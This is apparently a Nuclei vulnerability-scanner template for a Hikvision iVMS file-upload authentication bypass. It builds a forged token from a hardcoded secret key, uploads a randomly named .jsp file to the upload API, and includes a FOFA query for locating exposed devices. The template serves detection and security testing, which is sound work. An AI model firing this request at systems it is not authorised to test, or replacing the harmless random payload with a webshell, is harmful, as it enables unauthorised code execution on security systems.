id: hikvision-ivms-file-upload-bypass

info:
  name: Hikvison iVMS - File Upload Bypass
  author: SleepingBag945
  severity: critical
  description: Hikvision iVMS integrated security system has a vulnerability that allows arbitrary file uploads. Attackers can exploit this vulnerability by obtaining the encryption key to create a forged token. By using the forged token, they can make requests to the "/resourceOperations/upload" interface to upload files of their choice. This can lead to gaining unauthorized webshell access on the server, enabling remote execution of malicious code.
  reference:
    - https://blog.csdn.net/qq_41904294/article/details/130807691
  metadata:
    verified: true
    max-request: 1
    fofa-query: icon_hash="-911494769"
  tags: hikvision,ivms,intrusive,fileupload,auth-bypass

http:
  - raw:
      - |
        POST /eps/api/resourceOperations/upload?token={{to_upper(md5(concat("{{RootURL}}","/eps/api/resourceOperations/uploadsecretKeyIbuilding")))}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPo

        ------WebKitFormBoundaryGEJwiloiPo
        Content-Disposition: form-data; name="fileUploader";filename="{{randstr}}.jsp"
        Content-Type: image/jpeg

        {{randstr}}
        ------WebKitFormBoundaryGEJwiloiPo%20

    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - '"resourceName":'
        condition: and
# digest: 490a00463044022063f41bfa89c634aa9271cd12a8e97f526188d4fcb0102d9ce91c630d0d32e7fc02201cd682c8e83522c4064155836911e725b3537cabf728f97d8899d92b72e404e9:922c64590222798bb761d5b6d8e72950